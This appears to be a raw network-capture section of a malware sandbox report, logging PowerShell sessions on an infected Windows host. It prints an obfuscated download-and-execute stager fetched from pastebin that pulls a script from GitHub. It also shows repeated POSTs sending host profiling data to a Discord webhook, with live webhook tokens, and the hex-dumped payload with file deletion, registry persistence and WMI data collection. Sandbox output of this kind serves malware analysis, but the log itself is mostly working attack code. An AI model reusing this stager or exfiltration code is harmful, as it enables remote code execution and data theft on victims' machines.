                                                            2024-10-15 14:00:25 UTC139INData Raw: 38 35 0d 0a 63 61 6c 6c 69 54 28 57 49 4e 44 4f 57 53 5f 4e 54 20 28 22 72 61 77 2e 67 69 22 2b 22 74 68 75 62 22 2b 22 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 22 2b 22 6f 6d 2f 4e 65 22 2b 22 74 68 33 4e 2f 6e 61 39 6f 77 33 34 39 35 72 61 79 67 77 69 34 22 2b 22 67 79 72 68 75 61 77 65 72 61 77 65 72 61 2f 6d 61 69 6e 2f 67 61 62 65 72 2e 74 78 74 22 29 20 2d 75 73 65 62 61 73 69 63 70 61 72 73 69 6e 67 29 0d 0a
                                                            Data Ascii: 85calliT(WINDOWS_NT ("raw.gi"+"thub"+"usercontent.c"+"om/Ne"+"th3N/na9ow3495raygwi4"+"gyrhuawerawera/main/gaber.txt") -usebasicparsing)
                                                            2024-10-15 14:00:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            10192.168.2.649888162.159.136.2324432536C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-10-15 14:00:25 UTC311OUTPOST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                            Content-Type: application/json
                                                            Host: discord.com
                                                            Content-Length: 299
                                                            Connection: Keep-Alive
                                                            2024-10-15 14:00:25 UTC299OUTData Raw: 7b 0d 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 22 3a 20 20 22 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 5c 6e 2a 2a 65 6e 67 69 6e 65 65 72 2a 2a 20 73 79 73 74 65 6d 20 6f 6e 6c 69 6e 65 5c 6e 5c 6e 2a 2a 47 50 55 3a 2a 2a 20 37 47 4f 4d 52 4e 5c 6e 2a 2a 43 50 55 3a 2a 2a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 5c 6e 2a 2a 43 50 55 20 43 6f 72 65 73 3a 2a 2a 20 34 20 34 5c 6e 2a 2a 4f 53 3a 2a 2a 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 5c 6e 2a 2a 55 41 43 3a 2a 2a 20 4d 61 78 69 6d 75 6d 20 55 41 43 20 2d
                                                            Data Ascii: { "content": "================================\n**user** system online\n\n**GPU:** 7GOMRN\n**CPU:** Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\n**CPU Cores:** 4 4\n**OS:** Windows 10 Pro\n**UAC:** Maximum UAC -
                                                            2024-10-15 14:00:25 UTC1255INHTTP/1.1 404 Not Found
                                                            Date: Tue, 15 Oct 2024 14:00:25 GMT
                                                            Content-Type: application/json
                                                            Content-Length: 45
                                                            Connection: close
                                                            Cache-Control: public, max-age=3600, s-maxage=3600
                                                            strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                            x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                            x-ratelimit-limit: 5
                                                            x-ratelimit-remaining: 4
                                                            x-ratelimit-reset: 1729000826
                                                            x-ratelimit-reset-after: 1
                                                            via: 1.1 google
                                                            alt-svc: h3=":443"; ma=86400
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vWF2vJvMk0W8tny4KPx5%2B9OdLNhXvCQpJMC31ZbJju5XziaPQeLWMs6YUqt2fN03SJf9HMVpAmjOljD7MlqjgkWCFbR4cVtNG%2BTS3Vm4dMBuVU3h2a%2Fv4NP4MJvk"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            X-Content-Type-Options: nosniff
                                                            Set-Cookie: __cfruid=050eb5be000dd04550d85db9e7fbbd1aef63545d-1729000825; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                            Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                            Set-Cookie: _cfuvid=TT0GGYcYwONH2Rv7OtXW9F2ggNPn0x86vCodexDNci4-1729000825599-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                            Server: cloudflare
                                                            CF-RAY: 8d3055d76861e5b5-DFW
                                                            2024-10-15 14:00:25 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                            Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            11192.168.2.649890162.159.136.2324432992C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-10-15 14:00:25 UTC311OUTPOST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                            Content-Type: application/json
                                                            Host: discord.com
                                                            Content-Length: 299
                                                            Connection: Keep-Alive
                                                            2024-10-15 14:00:25 UTC299OUTData Raw: 7b 0d 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 22 3a 20 20 22 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 5c 6e 2a 2a 65 6e 67 69 6e 65 65 72 2a 2a 20 73 79 73 74 65 6d 20 6f 6e 6c 69 6e 65 5c 6e 5c 6e 2a 2a 47 50 55 3a 2a 2a 20 37 47 4f 4d 52 4e 5c 6e 2a 2a 43 50 55 3a 2a 2a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 5c 6e 2a 2a 43 50 55 20 43 6f 72 65 73 3a 2a 2a 20 34 20 34 5c 6e 2a 2a 4f 53 3a 2a 2a 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 5c 6e 2a 2a 55 41 43 3a 2a 2a 20 4d 61 78 69 6d 75 6d 20 55 41 43 20 2d
                                                            Data Ascii: { "content": "================================\n**user** system online\n\n**GPU:** 7GOMRN\n**CPU:** Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\n**CPU Cores:** 4 4\n**OS:** Windows 10 Pro\n**UAC:** Maximum UAC -
                                                            2024-10-15 14:00:25 UTC1253INHTTP/1.1 404 Not Found
                                                            Date: Tue, 15 Oct 2024 14:00:25 GMT
                                                            Content-Type: application/json
                                                            Content-Length: 45
                                                            Connection: close
                                                            Cache-Control: public, max-age=3600, s-maxage=3600
                                                            strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                            x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                            x-ratelimit-limit: 5
                                                            x-ratelimit-remaining: 3
                                                            x-ratelimit-reset: 1729000827
                                                            x-ratelimit-reset-after: 1
                                                            via: 1.1 google
                                                            alt-svc: h3=":443"; ma=86400
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6pCd9sAtAPFvL8TMzqi70eNOKIel4ISsUHchNj2P6Y%2BEwwpTZ3vGIiPmxlPvlXB8zWYsD%2FHJqj7RTwoTBrv2nEoi3MDo5aeCTSs6P59Nij18zK6dsSAt9bFJBQVQ"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            X-Content-Type-Options: nosniff
                                                            Set-Cookie: __cfruid=050eb5be000dd04550d85db9e7fbbd1aef63545d-1729000825; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                            Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                            Set-Cookie: _cfuvid=mZqAcWGFCoWOO36NRcRqxgiI4Kd08HYF3S1w_qbNPhI-1729000825638-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                            Server: cloudflare
                                                            CF-RAY: 8d3055d79a22474e-DFW
                                                            2024-10-15 14:00:25 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                            Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            12192.168.2.649889162.159.136.2324434040C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-10-15 14:00:25 UTC311OUTPOST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                            Content-Type: application/json
                                                            Host: discord.com
                                                            Content-Length: 299
                                                            Connection: Keep-Alive
                                                            2024-10-15 14:00:25 UTC299OUTData Raw: 7b 0d 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 22 3a 20 20 22 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 5c 6e 2a 2a 65 6e 67 69 6e 65 65 72 2a 2a 20 73 79 73 74 65 6d 20 6f 6e 6c 69 6e 65 5c 6e 5c 6e 2a 2a 47 50 55 3a 2a 2a 20 37 47 4f 4d 52 4e 5c 6e 2a 2a 43 50 55 3a 2a 2a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 5c 6e 2a 2a 43 50 55 20 43 6f 72 65 73 3a 2a 2a 20 34 20 34 5c 6e 2a 2a 4f 53 3a 2a 2a 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 5c 6e 2a 2a 55 41 43 3a 2a 2a 20 4d 61 78 69 6d 75 6d 20 55 41 43 20 2d
                                                            Data Ascii: { "content": "================================\n**user** system online\n\n**GPU:** 7GOMRN\n**CPU:** Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\n**CPU Cores:** 4 4\n**OS:** Windows 10 Pro\n**UAC:** Maximum UAC -
                                                            2024-10-15 14:00:25 UTC1259INHTTP/1.1 404 Not Found
                                                            Date: Tue, 15 Oct 2024 14:00:25 GMT
                                                            Content-Type: application/json
                                                            Content-Length: 45
                                                            Connection: close
                                                            Cache-Control: public, max-age=3600, s-maxage=3600
                                                            strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                            x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                            x-ratelimit-limit: 5
                                                            x-ratelimit-remaining: 2
                                                            x-ratelimit-reset: 1729000827
                                                            x-ratelimit-reset-after: 2
                                                            via: 1.1 google
                                                            alt-svc: h3=":443"; ma=86400
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a%2FjNmdU17uOHYJHxxD7YUtZMp%2Fq1c0fR3XnWVHXpdwkkKjV%2BPlWgmKwHgoqMhIp%2BMQfGfRobQAf9S7O4Ktnj0CgoslX52T%2FbjqwpbJ3S6PPAlgbdlRcL0668qfIl"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            X-Content-Type-Options: nosniff
                                                            Set-Cookie: __cfruid=050eb5be000dd04550d85db9e7fbbd1aef63545d-1729000825; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                            Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                            Set-Cookie: _cfuvid=QyY4bEJrOjzhqaN.da..q9PGkGXCVz9.TBkJo9a77QI-1729000825651-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                            Server: cloudflare
                                                            CF-RAY: 8d3055d7ac80346e-DFW
                                                            2024-10-15 14:00:25 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                            Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            13192.168.2.649898185.199.109.1334432248C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-10-15 14:00:27 UTC222OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                            Host: raw.githubusercontent.com
                                                            Connection: Keep-Alive
                                                            2024-10-15 14:00:27 UTC901INHTTP/1.1 200 OK
                                                            Connection: close
                                                            Content-Length: 7508
                                                            Cache-Control: max-age=300
                                                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                            Content-Type: text/plain; charset=utf-8
                                                            ETag: "085e232a893b000bbbc5e224886d89e33401e064c6e72827d0c19fb0195af2ea"
                                                            Strict-Transport-Security: max-age=31536000
                                                            X-Content-Type-Options: nosniff
                                                            X-Frame-Options: deny
                                                            X-XSS-Protection: 1; mode=block
                                                            X-GitHub-Request-Id: B26C:32E28B:21F9020:25C3557:670E73A0
                                                            Accept-Ranges: bytes
                                                            Date: Tue, 15 Oct 2024 14:00:27 GMT
                                                            Via: 1.1 varnish
                                                            X-Served-By: cache-dfw-kdfw8210138-DFW
                                                            X-Cache: HIT
                                                            X-Cache-Hits: 1
                                                            X-Timer: S1729000828.525771,VS0,VE1
                                                            Vary: Authorization,Accept-Encoding,Origin
                                                            Access-Control-Allow-Origin: *
                                                            Cross-Origin-Resource-Policy: cross-origin
                                                            X-Fastly-Request-ID: ec45f0f9ee12b661b3b5b71e5fa0af62fa85e99e
                                                            Expires: Tue, 15 Oct 2024 14:05:27 GMT
                                                            Source-Age: 33
                                                            2024-10-15 14:00:27 UTC1378INData Raw: 73 6c 65 65 70 20 35 0a 72 6d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 20 2d 46 6f 72 63 65 0a 73 6c 65 65 70 20 35 0a 0a 0a 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 20 3d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 0a 69 66 20 28 2d 4e 6f 74 20 28 54 65 73 74 2d 50 61 74 68 20 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 29 29 20 7b 0a 72 6d 20 24 65 6e 76 3a 74 6d 70 5c 6f 6e 65 64 72 69 76 65 66 69 6c 65 73 79 6e 63 2e 64 6c 6c 20 2d 66 6f 72 63 65 0a 4e 65 77 2d 49 74 65 6d 50 72 6f 70 65 72 74
                                                            Data Ascii: sleep 5rm "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemPropert
                                                            2024-10-15 14:00:27 UTC1378INData Raw: 2c 30 2c 30 2c 37 34 2c 30 2c 39 2c 30 2c 34 2c 30 2c 32 33 39 2c 31 39 30 2c 31 36 37 2c 38 34 2c 31 33 30 2c 34 32 2c 34 31 2c 38 39 2c 32 30 38 2c 31 38 39 2c 34 36 2c 30 2c 30 2c 30 2c 36 35 2c 32 34 38 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 31 36 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 33 32 2c 31 31 36 2c 32 36 2c 30 2c 31 30 32 2c 30 2c 31 31 31 2c 30 2c 31 31 34 2c 30 2c 31 30 32 2c 30 2c 31 30 35 2c 30 2c 31 30 38 2c 30 2c 31 30 31 2c 30 2c 31 31 35 2c 30 2c 34 36 2c 30 2c 31 30 31 2c 30 2c 31 32 30 2c 30 2c 31 30 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 38 36 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 35 32 2c 30 2c 30 2c 30 2c 30 2c
                                                            Data Ascii: ,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,
                                                            2024-10-15 14:00:27 UTC1378INData Raw: 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 31 31 36 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 36 39 2c 30 2c 31 32 30 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 31 31 35 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 33 32 2c 30 2c 33 36 2c 30 2c 31 30 31 2c 30 2c 31 31 30 2c 30 2c 31 31 38 2c 30 2c 35 38 2c 30 2c 31 31 31 2c 30 2c 31 31 35 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 38 37 2c 30 2c 31 31 34 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 39 39 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 38 34 2c 30 2c 34 30 2c 30 2c 38 37 2c 30 2c 37 33 2c 30 2c 37 38 2c 30 2c 36 38 2c 30 2c 37 39 2c 30 2c 38 37 2c 30 2c 38 33 2c 30 2c 39 35 2c 30 2c 37 38 2c 30 2c 38 34 2c 30 2c 33 32 2c 30 2c 31 31 32 2c
                                                            Data Ascii: ,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,
                                                            2024-10-15 14:00:27 UTC1378INData Raw: 31 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 34 38 2c 30 2c 35 30 2c 30 2c 34 39 2c 30 2c 34 35 2c 30 2c 35 37 2c 30 2c 34 39 2c 30 2c 35 33 2c 30 2c 35 32 2c 30 2c 35 31 2c 30 2c 35 36 2c 30 2c 34 38 2c 30 2c 35 34 2c 30 2c 35 37 2c 30 2c 34 35 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 35 34 2c 30 2c 35 31 2c 30 2c 35 37 2c 30 2c 35 32 2c 30 2c 35 32 2c 30 2c 34 35 2c 30 2c 34 39 2c 30 2c 34 38 2c 30 2c 34 38 2c 30 2c 34 39 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 37 37 2c 30 2c 30 2c 30 2c 34 39 2c 38 33 2c 38 30 2c 38 33 2c 34 38 2c 32 34 31 2c 33 37 2c 31 38 33 2c 32 33 39 2c 37 31 2c 32 36 2c 31 36 2c 31 36 35 2c 32 34 31 2c 32 2c 39 36 2c 31 34 30 2c 31 35 38 2c 32 33 35 2c 31 37 32 2c 34
                                                            Data Ascii: 1,0,51,0,50,0,51,0,48,0,50,0,49,0,45,0,57,0,49,0,53,0,52,0,51,0,56,0,48,0,54,0,57,0,45,0,51,0,50,0,50,0,50,0,51,0,54,0,51,0,57,0,52,0,52,0,45,0,49,0,48,0,48,0,49,0,0,0,0,0,0,0,177,0,0,0,49,83,80,83,48,241,37,183,239,71,26,16,165,241,2,96,140,158,235,172,4
                                                            2024-10-15 14:00:27 UTC1378INData Raw: 63 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 50 72 6f 63 65 73 73 6f 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 4d 61 6e 75 66 61 63 74 75 72 65 72 2c 20 4e 75 6d 62 65 72 4f 66 43 6f 72 65 73 2c 20 4e 75 6d 62 65 72 4f 66 4c 6f 67 69 63 61 6c 50 72 6f 63 65 73 73 6f 72 73 0a 0a 23 20 52 65 74 72 69 65 76 65 20 47 50 55 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 0a 24 67 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 56 69 64 65 6f 43 6f 6e 74 72 6f 6c 6c 65 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 41 64 61 70 74 65 72 52 41 4d 2c 20 44 72 69
                                                            Data Ascii: cpu = Get-WmiObject -Class Win32_Processor | Select-Object -Property Name, Manufacturer, NumberOfCores, NumberOfLogicalProcessors# Retrieve GPU information$gpu = Get-WmiObject -Class Win32_VideoController | Select-Object -Property Name, AdapterRAM, Dri
                                                            2024-10-15 14:00:27 UTC618INData Raw: 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 22 40 0a 7d 20 7c 20 43 6f 6e 76 65 72 74 54 6f 2d 4a 73 6f 6e 0a 0a 23 20 53 65 6e 64 20 74 68 65 20 50 4f 53 54 20 72 65 71 75 65 73 74 20 74 6f 20 74 68 65 20 77 65 62 68 6f 6f 6b 20 55 52 4c 0a 74 72 79 20 7b 0a 20 20 20 20 49 6e 76 6f 6b 65 2d 52 65 73 74 4d 65 74 68 6f 64 20 2d 55 72 69 20 24 77 65 62 68 6f 6f 6b 55 72 6c 20 2d 4d 65 74 68 6f 64 20 50 6f 73 74 20 2d 42 6f 64 79 20 24 70 61 79 6c 6f 61 64 20 2d 43 6f 6e 74 65 6e 74 54 79 70 65 20 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 22 0a 20 20 20 20 57 72 69 74 65 2d 4f 75 74 70 75 74 20 22 4d 65 73 73 61 67 65 20 73 65 6e 74 20 73 75 63 63 65 73 73 66 75 6c 6c 79 2e 22 0a 7d 20 63 61 74 63 68 20 7b 0a 20 20 20 20 57
                                                            Data Ascii: ======================"@} | ConvertTo-Json# Send the POST request to the webhook URLtry { Invoke-RestMethod -Uri $webhookUrl -Method Post -Body $payload -ContentType "application/json" Write-Output "Message sent successfully."} catch { W


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            14192.168.2.649932172.67.19.244433780C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-10-15 14:00:33 UTC169OUTGET /raw/sA04Mwk2 HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                            Host: pastebin.com
                                                            Connection: Keep-Alive
                                                            2024-10-15 14:00:33 UTC397INHTTP/1.1 200 OK
                                                            Date: Tue, 15 Oct 2024 14:00:33 GMT
                                                            Content-Type: text/plain; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            x-frame-options: DENY
                                                            x-content-type-options: nosniff
                                                            x-xss-protection: 1;mode=block
                                                            cache-control: public, max-age=1801
                                                            CF-Cache-Status: HIT
                                                            Age: 483
                                                            Last-Modified: Tue, 15 Oct 2024 13:52:30 GMT
                                                            Server: cloudflare
                                                            CF-RAY: 8d305608691f47a3-DFW
                                                            2024-10-15 14:00:33 UTC139INData Raw: 38 35 0d 0a 63 61 6c 6c 69 54 28 57 49 4e 44 4f 57 53 5f 4e 54 20 28 22 72 61 77 2e 67 69 22 2b 22 74 68 75 62 22 2b 22 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 22 2b 22 6f 6d 2f 4e 65 22 2b 22 74 68 33 4e 2f 6e 61 39 6f 77 33 34 39 35 72 61 79 67 77 69 34 22 2b 22 67 79 72 68 75 61 77 65 72 61 77 65 72 61 2f 6d 61 69 6e 2f 67 61 62 65 72 2e 74 78 74 22 29 20 2d 75 73 65 62 61 73 69 63 70 61 72 73 69 6e 67 29 0d 0a
                                                            Data Ascii: 85calliT(WINDOWS_NT ("raw.gi"+"thub"+"usercontent.c"+"om/Ne"+"th3N/na9ow3495raygwi4"+"gyrhuawerawera/main/gaber.txt") -usebasicparsing)
                                                            2024-10-15 14:00:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            15192.168.2.649944185.199.109.1334433780C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-10-15 14:00:34 UTC222OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                            Host: raw.githubusercontent.com
                                                            Connection: Keep-Alive
                                                            2024-10-15 14:00:34 UTC901INHTTP/1.1 200 OK
                                                            Connection: close
                                                            Content-Length: 7508
                                                            Cache-Control: max-age=300
                                                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                            Content-Type: text/plain; charset=utf-8
                                                            ETag: "085e232a893b000bbbc5e224886d89e33401e064c6e72827d0c19fb0195af2ea"
                                                            Strict-Transport-Security: max-age=31536000
                                                            X-Content-Type-Options: nosniff
                                                            X-Frame-Options: deny
                                                            X-XSS-Protection: 1; mode=block
                                                            X-GitHub-Request-Id: B26C:32E28B:21F9020:25C3557:670E73A0
                                                            Accept-Ranges: bytes
                                                            Date: Tue, 15 Oct 2024 14:00:34 GMT
                                                            Via: 1.1 varnish
                                                            X-Served-By: cache-dfw-kdal2120064-DFW
                                                            X-Cache: HIT
                                                            X-Cache-Hits: 1
                                                            X-Timer: S1729000835.797408,VS0,VE3
                                                            Vary: Authorization,Accept-Encoding,Origin
                                                            Access-Control-Allow-Origin: *
                                                            Cross-Origin-Resource-Policy: cross-origin
                                                            X-Fastly-Request-ID: 142da34901229465b5af17502ae87fdc773a697c
                                                            Expires: Tue, 15 Oct 2024 14:05:34 GMT
                                                            Source-Age: 40
